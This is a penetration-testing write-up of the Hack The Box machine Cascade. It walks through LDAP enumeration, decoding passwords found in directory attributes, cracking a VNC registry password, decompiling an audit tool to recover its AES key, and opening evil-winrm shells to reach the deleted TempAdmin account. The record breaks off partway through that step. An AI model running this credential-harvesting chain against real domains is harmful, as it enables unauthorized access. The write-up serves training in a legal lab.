Hack The Box Write-Up Cascade - 10.10.10.182
Post
Cancel

# Hack The Box Write-Up Cascade - 10.10.10.182

Bill Gates

In this post, I’m writing a write-up for the machine Cascade from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Cascade is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold

After the initial port scan, I found a bunch of open ports. This step in this box relies on good enumeration. Only through port 389/tcp (LDAP), with Nmap, I was able to pull some information from the Active Directory and I found the user accounts. From this point, I switched to the tool ldapsearch and found the credentials for the user r.thompson.

User

Through the credentials of r.thompson, I was able to view the listed shares, through port 445/tcp (SMB), and view the contents of the shares. In the shared folder Temp I found a folder with the name s.smith. This folder contained a VNC registry file with a HEX formatted password. After cracking this HEX I was able to establish a WinRM connection to this box with the user s.smith and get the user flag.

Root

With the user s.smith I’ve started again my enumeration phase. I found a compiled .exe program with the Audit.db database. This program needs to be decompiled. After reverse-engineering this program I found out that this program is decrypting a password hash which can be found in the Audit.db database. After the decryption of this hash, I was able to create a WinRM session with the user Svcark. With Powershell, I was able to check the properties of the deleted user TempAdmin and found the password. As this user has the same password as the Administrator, I was able to create a WinRM session as Administrator with the password I found.

# Recon

## Port scan with Nmap

As always I start the port scan with Nmap.

1 nmap 10.10.10.182 -sC -sV -oA ./nmap/cascade.txt 

The output of the port scan.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 17:28 EDT Nmap scan report for 10.10.10.182 Host is up (0.082s latency). Not shown: 990 filtered ports PORT STATE SERVICE VERSION 88/tcp open kerberos-sec? 135/tcp open msrpc? 139/tcp open netbios-ssn? 389/tcp open ldap? 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 2m24s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-04-02T21:31:20 |_ start_date: 2020-04-02T21:30:34 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 94.49 seconds 

According to the open ports we are dealing with an Active Directory server. I’ll explain some of the open ports I’m going to use in the enumeration process.

Kerberos (88/tcp)
This is a network authentication protocol that works with tickets to allow users and clients to authenticate themselves over the network to the Key Distribution Center (KDC). In a Windows environment, this KDC is located on a domain controller.

Occasionally, configuration errors by system administrators result in security breaches that are used to obtain Kerberos tickets and gain unauthorized access to an account.

Lightweight Directory Access Protocol (LDAP)
This is a network protocol and is an open, vendor-neutral, standard protocol for accessing directory information over the network. In this case from the Active Directory. The default port for non-SSL communication is 389/tcp and for LDAP over SSL is 636/tcp.

Successful exploitation of LDAP could allow access to unauthorized content and is very useful by the enumeration of the target. Sometimes it is possible to anonymously query the LDAP, this is a great deal for gathering information.

# Enumeration

## Enumeration LDAP

Let’s start by searching for user accounts. Since the LDAP port 389 is open, I can try to use the NSE scripts from Nmap to search for useful information. We are dealing with a Windows Server 2008 R2 server with the hostname CASC-DC1. The domain name cascade.local. Important to note that this operating system is EOL per January 14th, 2020. Maybe there are known vulnerabilities we can use.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 ~$nmap -p 389 --script ldap-search --script-args 'ldap.qfilter=computers' 10.10.10.182 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 16:24 EDT Nmap scan report for 10.10.10.182 Host is up (0.043s latency). PORT STATE SERVICE 389/tcp open ldap | ldap-search: | Context: DC=cascade,DC=local; QFilter: computers | dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local | objectClass: top | objectClass: person | objectClass: organizationalPerson | objectClass: user | objectClass: computer | cn: CASC-DC1 | distinguishedName: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local | instanceType: 4 | whenCreated: 2020/01/09 15:32:15 UTC | whenChanged: 2020/04/03 14:55:48 UTC | uSNCreated: 12293 | uSNChanged: 323669 | name: CASC-DC1 | objectGUID: e3543163-a268-f740-a214-29877d92d539 | userAccountControl: 532480 | badPwdCount: 0 | codePage: 0 | countryCode: 0 | badPasswordTime: 2020-04-03T19:31:40+00:00 | lastLogoff: 0 | lastLogon: 2020-04-04T00:29:05+00:00 | localPolicyFlags: 0 | pwdLastSet: 2020-04-03T19:01:06+00:00 | primaryGroupID: 516 | objectSid: 1-5-21-3332504370-1206983947-1165150453-1001 | accountExpires: 30828-09-14T06:53:31+00:00 | logonCount: 5387 | sAMAccountName: CASC-DC1$ | sAMAccountType: 805306369 | operatingSystem: Windows Server 2008 R2 Standard | operatingSystemVersion: 6.1 (7601) | operatingSystemServicePack: Service Pack 1 | serverReferenceBL: CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local | dNSHostName: CASC-DC1.cascade.local 

After changing the search to the user accounts, I receive some useful information.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 ~$nmap -p 389 --script ldap-search --script-args 'ldap.qfilter=users,ldap.attrib=sAMAccountName' 10.10.10.182 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 16:13 EDT Nmap scan report for 10.10.10.182 Host is up (0.045s latency). PORT STATE SERVICE 389/tcp open ldap | ldap-search: | Context: DC=cascade,DC=local; QFilter: users; Attributes: sAMAccountName | dn: CN=CascGuest,CN=Users,DC=cascade,DC=local | sAMAccountName: CascGuest | dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local | sAMAccountName: CASC-DC1$ | dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: arksvc | dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: s.smith | dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: r.thompson | dn: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: util | dn: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: j.wakefield | dn: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: s.hickson | dn: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: j.goodhand | dn: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: a.turnbull | dn: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: e.crowe | dn: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: b.hanson | dn: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: d.burman | dn: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: BackupSvc | dn: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local | sAMAccountName: j.allen | dn: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local |_ sAMAccountName: i.croft Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds 

As this is a box created by VBScrub, I think that the users has a VBS login script :-). Lets check.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 ~$nmap -p 389 --script ldap-search --script-args 'ldap.qfilter=users,ldap.attrib=scriptPath' 10.10.10.182 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 16:36 EDT Nmap scan report for 10.10.10.182 Host is up (0.056s latency). PORT STATE SERVICE 389/tcp open ldap | ldap-search: | Context: DC=cascade,DC=local; QFilter: users; Attributes: scriptPath | dn: CN=CascGuest,CN=Users,DC=cascade,DC=local | dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local | dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local | dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapAuditDrive.vbs | dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local | dn: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local | dn: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapDataDrive.vbs | dn: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapDataDrive.vbs | dn: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapDataDrive.vbs | dn: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local | dn: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapDataDrive.vbs | dn: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local | dn: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapDataDrive.vbs | dn: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local | dn: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local | scriptPath: MapDataDrive.vbs | dn: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local |_ scriptPath: MapDataDrive.vbs Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds  And, the users have a login script. Cool! This script is located in the sysvol folder. Before we can access this folder we need to have some credentials or a shell. ## Enumeration with ldapsearch For enumerating the users further through LDAP I switched through the tool ldapsearch. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 ~$ ldapsearch -h 10.10.10.182 -p 389 -x -b "CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local" # extended LDIF # # LDAPv3 # base &lt;CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local> with scope subtree # filter: (objectclass=*) # requesting: ALL # # Ryan Thompson, Users, UK, cascade.local dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Ryan Thompson sn: Thompson givenName: Ryan distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local instanceType: 4 whenCreated: 20200109193126.0Z whenChanged: 20200406170015.0Z displayName: Ryan Thompson uSNCreated: 24610 memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local uSNChanged: 323784 name: Ryan Thompson objectGUID:: LfpD6qngUkupEy9bFXBBjA== userAccountControl: 66048 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 132306688242589040 lastLogoff: 0 lastLogon: 132306688312321163 pwdLastSet: 132230718862636251 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA== accountExpires: 9223372036854775807 logonCount: 2 sAMAccountName: r.thompson sAMAccountType: 805306368 userPrincipalName: [email protected] objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local dSCorePropagationData: 20200126183918.0Z dSCorePropagationData: 20200119174753.0Z dSCorePropagationData: 20200119174719.0Z dSCorePropagationData: 20200119174508.0Z dSCorePropagationData: 16010101000000.0Z lastLogonTimestamp: 132306660152867703 msDS-SupportedEncryptionTypes: 0 cascadeLegacyPwd: clk0bjVldmE= # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 

I got now the password of the user Ryan Thompson. It seems that this password is base64 encoded and needs some decoding.

1 2 ~$echo "clk0bjVldmE=" | base64 -d rY4n5eva  Ok, I got a password. Let’s enter the next phase. ## Intrusion ## SMB access According to the port scan the SMB 445/tcp port is open. Let’s check if I have access to some Windows Shares. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 ~$ smbclient -L //10.10.10.182 -U r.thompson -W cascade.local Enter CASCADE.LOCAL\r.thompson's password: Sharename Type Comment --------- ---- ------- ADMIN$Disk Remote Admin Audit$ Disk C$Disk Default share Data Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available  As the user r.thompson does not have access to the Audit$ share, I start with checking the contents of the Data share. In the listed directories r.thompson has only the permissions to view the contents of the IT, Production and Temps directories.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 ~$smbclient //10.10.10.182/Data -U r.thompson -W cascade.local Enter CASCADE.LOCAL\r.thompson's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jan 26 22:27:34 2020 .. D 0 Sun Jan 26 22:27:34 2020 Contractors D 0 Sun Jan 12 20:45:11 2020 Finance D 0 Sun Jan 12 20:45:06 2020 IT D 0 Tue Jan 28 13:04:51 2020 Production D 0 Sun Jan 12 20:45:18 2020 Temps D 0 Sun Jan 12 20:45:15 2020 13106687 blocks of size 4096. 7793805 blocks available smb: \>  After searching through the directories, I found some useful files and downloaded them to my system for further investigation. 1 2 3 4 5 6 7 8 9 10 11 12 13 ... smb: \IT\Email Archives\> mget "Meeting_Notes_June_2018.html" Get file Meeting_Notes_June_2018.html? y getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (12.4 KiloBytes/sec) (average 12.4 KiloBytes/sec) smb: \IT\Logs\Ark AD Recycle Bin\> mget "ArkAdRecycleBin.log" Get file ArkAdRecycleBin.log? y getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (6.3 KiloBytes/sec) (average 9.3 KiloBytes/sec) smb: \IT\Logs\DCs\> mget dcdiag.log Get file dcdiag.log? y getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (27.9 KiloBytes/sec) (average 12.7 KiloBytes/sec) smb: \IT\Temp\s.smith\> mget "VNC Install.reg" Get file VNC Install.reg? y getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (11.3 KiloBytes/sec) (average 14.0 KiloBytes/sec)  Before I review the files for useful contents. Let’s check the other shares for more files. As I have found some logon scripts, they are default located in the SYSVOL folder. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ~$ smbclient //10.10.10.182/Sysvol -U r.thompson -W cascade.local Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Jan 9 10:31:27 2020 .. D 0 Thu Jan 9 10:31:27 2020 cascade.local D 0 Thu Jan 9 10:31:27 2020 13106687 blocks of size 4096. 7798530 blocks available In the directory 'scripts' are the VBS-scripts located. I downloaded these files to my machine for investigation. smb: \cascade.local\scripts\> ls . D 0 Wed Jan 15 16:50:33 2020 .. D 0 Wed Jan 15 16:50:33 2020 MapAuditDrive.vbs A 258 Wed Jan 15 16:50:15 2020 MapDataDrive.vbs A 255 Wed Jan 15 16:51:03 2020 13106687 blocks of size 4096. 7798530 blocks available smb: \cascade.local\scripts\> mget MapAuditDrive.vbs Get file MapAuditDrive.vbs? y getting file \cascade.local\scripts\MapAuditDrive.vbs of size 258 as MapAuditDrive.vbs (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec) smb: \cascade.local\scripts\> mget MapDataDrive.vbs Get file MapDataDrive.vbs? y getting file \cascade.local\scripts\MapDataDrive.vbs of size 255 as MapDataDrive.vbs (1.1 KiloBytes/sec) (average 1.0 KiloBytes/sec) smb: \cascade.local\scripts\> 

Meeting_Notes_June_2018.html
This is an e-mail message to the internal IT that the new production network goes live on Wednesday. The second part of this note is quite interesting. There is a TempAdmin account being created with the same password as the Administrator account. This is very insecure but maybe I can use this to my advantage.

It seems that the Recycle Bin for the Active Directory is enabled in this forest. This is extremely useful in this case. As the user account TempAdmin is removed from the Active Directory, it still remains in the Recycle Bin for 180 days. When I have access to the service account CASCADE\ArkSvc I could restore this user or review the properties and maybe I can find the password to gain DA privileges.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ~$cat ArkAdRecycleBin.log 1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 1/10/2018 15:43 [MAIN_THREAD] Validating settings... 1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied 1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5 2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 2/10/2018 15:56 [MAIN_THREAD] Validating settings... 2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc 2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local 2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local 2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0 8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 8/12/2018 12:22 [MAIN_THREAD] Validating settings... 8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc 8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local 8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0  dcdiag.log the Program dcdiag analyzes the state of the Domain Controllers in forest and reports problems for troubleshooting. I have revied this file, but there is nothing useful there. VNC Install.reg This file contains the software settings from a TightVNC server. There is a password in HEX-format and this password needs to be cracked. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ~$ cat VNC\ Install.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC] [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server] "ExtraPorts"="" "QueryTimeout"=dword:0000001e "QueryAcceptOnTimeout"=dword:00000000 "LocalInputPriorityTimeout"=dword:00000003 "LocalInputPriority"=dword:00000000 "BlockRemoteInput"=dword:00000000 "BlockLocalInput"=dword:00000000 "IpAccessControl"="" "RfbPort"=dword:0000170c "HttpPort"=dword:000016a8 "DisconnectAction"=dword:00000000 "AcceptRfbConnections"=dword:00000001 "UseVncAuthentication"=dword:00000001 "UseControlAuthentication"=dword:00000000 "RepeatControlAuthentication"=dword:00000000 "LoopbackOnly"=dword:00000000 "AcceptHttpConnections"=dword:00000001 "LogLevel"=dword:00000000 "EnableFileTransfers"=dword:00000001 "RemoveWallpaper"=dword:00000001 "UseD3D"=dword:00000001 "UseMirrorDriver"=dword:00000001 "EnableUrlParams"=dword:00000001 "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f "AlwaysShared"=dword:00000000 "NeverShared"=dword:00000000 "DisconnectClients"=dword:00000001 "PollingInterval"=dword:000003e8 "AllowLoopback"=dword:00000000 "VideoRecognitionInterval"=dword:00000bb8 "GrabTransparentWindows"=dword:00000001 "SaveLogToAllUsersPath"=dword:00000000 "RunControlInterface"=dword:00000001 "IdleTimeout"=dword:00000000 "VideoClasses"="" "VideoRects"="" 

I found a program for cracking this password in this website: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/. I switched do my windows box and cracked the hex password.

This has to be the password for the user Steve Smith with the username zs.smith: sT333ve2z.

MapAuditDrive.vbs
This file contains a Visual Basic script which creates a network mapping to the \\CASC-DC1\Audit$. 1 2 3 4 5 6 Option Explicit Dim oNetwork, strDriveLetter, strRemotePath strDriveLetter = "F:" strRemotePath = "\\CASC-DC1\Audit$" Set oNetwork = CreateObject("WScript.Network") oNetwork.MapNetworkDrive strDriveLetter, strRemotePath 

This file contains a Visual Basic script which creates a network mapping to the \\CASC-DC1\Data.

1 2 3 4 5 6 Option Explicit Dim oNetwork, strDriveLetter, strRemotePath strDriveLetter = "O:" strRemotePath = "\\CASC-DC1\Data" Set oNetwork = CreateObject("WScript.Network") oNetwork.MapNetworkDrive strDriveLetter, strRemotePath 

## Get the user flag

As I’m now aware of the password for the user Steve Smith, I can create a WinRM session to this machine with his account, and with his account, I can grab the user flag.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ~$evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\s.smith\Documents> ls *Evil-WinRM* PS C:\Users\s.smith\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\s.smith\Desktop> ls Directory: C:\Users\s.smith\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 4/6/2020 3:17 PM 34 user.txt -a---- 3/25/2020 11:17 AM 1031 WinDirStat.lnk *Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt 4c80862f2d03c1d5fe319f09d5861004  # Privilege Escalation ## Reverse Engineering CascAudit.exe I have started again the enumeration phase by checking all the shares again with the user s.smith. Unlike the user account of r.thompson, s.smith does have access to the shared folder Audit$.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $smbclient //10.10.10.182/Audit$ -U s.smith -W cascade.local Enter CASCADE.LOCAL\s.smith's password: Try "help" to get a list of possible commands. smb: \> ks ks: command not found smb: \> ls . D 0 Wed Jan 29 13:01:26 2020 .. D 0 Wed Jan 29 13:01:26 2020 CascAudit.exe A 13312 Tue Jan 28 16:46:51 2020 CascCrypto.dll A 12288 Wed Jan 29 13:00:20 2020 DB D 0 Tue Jan 28 16:40:59 2020 RunAudit.bat A 45 Tue Jan 28 18:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019 x64 D 0 Sun Jan 26 17:25:27 2020 x86 D 0 Sun Jan 26 17:25:27 2020 13106687 blocks of size 4096. 7797819 blocks available 

As the CascAudit.exe cannot be opened in my Kali machine, I switched to my Windows machine and decompiled this program to find out what this program is doing. For decompiling this program I used JustDecompile (https://www.telerik.com/products/decompiler.aspx). I opened the CascAudit.exe in JustDecompile.

MainModule
This part will be executed on the program launch. This part of the program is very interesting because it is decrypting a password. The variable str1 is called as the password for decryption. The program reads the hash from the Audit.db file.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 sQLiteConnection.Open(); using (SQLiteCommand sQLiteCommand = new SQLiteCommand("SELECT * FROM LDAP", sQLiteConnection)) { using (SQLiteDataReader sQLiteDataReader = sQLiteCommand.ExecuteReader()) { sQLiteDataReader.Read(); empty = Conversions.ToString(sQLiteDataReader["Uname"]); empty1 = Conversions.ToString(sQLiteDataReader["Domain"]); string str1 = Conversions.ToString(sQLiteDataReader["Pwd"]); try { str = Crypto.DecryptString(str1, "c4scadek3y654321"); } catch (Exception exception) { ProjectData.SetProjectError(exception); Console.WriteLine(string.Concat("Error decrypting password: ", exception.Message)); ProjectData.ClearProjectError(); return; } } } sQLiteConnection.Close(); 

Audit.db
With strings I can capture the hash from the database: Hash: BQO5l5Kj9MdErXx6Q6AGOw==

1 2 3 4 5 6 7 8 9 10 11 12 13 ~/Audit/DB$strings Audit.db ... Mdeleteddeleted guy DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deefCN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local ?testTest DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6dCN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local ='ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local sqlb_temp_table_ DeletedUserAudit Ldap dddddddd DEL:f9bfa86b-d7ab-45 ...  CascCrypto.dll This file contains static content required for encrypting and decrypting the password. The password is encrypted with an AES-128 bit (CBC) encryption and this file also contains the initialization vector needed for the decryption. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 using System; using System.IO; using System.Security.Cryptography; using System.Text; namespace CascCrypto { public class Crypto { public const string DefaultIV = "1tdyjCbY1Ix49842"; public const int Keysize = 128; public Crypto() { } public static string DecryptString(string EncryptedString, string Key) { string str; byte[] numArray = Convert.FromBase64String(EncryptedString); Aes bytes = Aes.Create(); bytes.KeySize = 128; bytes.BlockSize = 128; bytes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842"); bytes.Mode = CipherMode.CBC; bytes.Key = Encoding.UTF8.GetBytes(Key); using (MemoryStream memoryStream = new MemoryStream(numArray)) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, bytes.CreateDecryptor(), CryptoStreamMode.Read)) { byte[] numArray1 = new byte[checked(checked(checked((int)numArray.Length) - 1) + 1)]; cryptoStream.Read(numArray1, 0, checked((int)numArray1.Length)); str = Encoding.UTF8.GetString(numArray1); } } return str; } public static string EncryptString(string Plaintext, string Key) { string base64String; byte[] bytes = Encoding.UTF8.GetBytes(Plaintext); Aes ae = Aes.Create(); ae.BlockSize = 128; ae.KeySize = 128; ae.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842"); ae.Key = Encoding.UTF8.GetBytes(Key); ae.Mode = CipherMode.CBC; using (MemoryStream memoryStream = new MemoryStream()) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, ae.CreateEncryptor(), CryptoStreamMode.Write)) { cryptoStream.Write(bytes, 0, checked((int)bytes.Length)); cryptoStream.FlushFinalBlock(); } base64String = Convert.ToBase64String(memoryStream.ToArray()); } return base64String; }  ## Decryption password for ArkSvc Now I’ve gathered it all together for a good recipe. Namely: decryption. I used CyberChef to decrypt this hash. I got now the password password: w3lc0meFr31nd ## Gaining access with arksvc I have now the password of the user arksvc. With Evil-WinRM I have created a shell to this box. 1 2 3 4 5 6 7 ~$ evil-winrm -u arksvc -p w3lc0meFr31nd -i 10.10.10.182 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\arksvc\Documents> 

As I already know the user TempAdmin, has the same password as the ‘normal admin’. Through the logfile ArkAdRecycleBin.log I know that this user account has removed the TempAdmin account and that this account is stored in the Active Directory Recycle Bin.

The next step: Try to find the removed account TempAdmin with Powershell and maybe I can find the password in the same way how I’ve found the password of the user r.thompson. With the Powershell cmdlet Get-ADObject, I’m able to find two removed Active Directory objects.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 *Evil-WinRM* PS C:\Users\arksvc\Documents> get-adobject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -filter{ObjectClass -eq "user"} -IncludeDeletedObjects Deleted : True DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local Name : CASC-WS1 DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe ObjectClass : computer ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe Deleted : True DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 ObjectClass : user ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059 *Evil-WinRM* PS C:\Users\arksvc\Documents> 

I know the ObjectGUID of the account I need to have. I can now narrow down the command to get all of the properties of this user. And, I found the password.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 *Evil-WinRM* PS C:\Users\arksvc\Documents> get-adobject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -filter{objectguid -eq "f0cc344d-31e0-4866-bceb-a842791ca059"} -IncludeDeletedObjects -properties * | fl * accountExpires : 9223372036854775807 badPasswordTime : 0 badPwdCount : 0 CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 codePage : 0 countryCode : 0 Created : 1/27/2020 3:23:08 AM createTimeStamp : 1/27/2020 3:23:08 AM Deleted : True Description : DisplayName : TempAdmin DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM} givenName : TempAdmin instanceType : 4 isDeleted : True LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local lastLogoff : 0 lastLogon : 0 logonCount : 0 Modified : 1/27/2020 3:24:34 AM modifyTimeStamp : 1/27/2020 3:24:34 AM msDS-LastKnownRDN : TempAdmin Name : TempAdmin 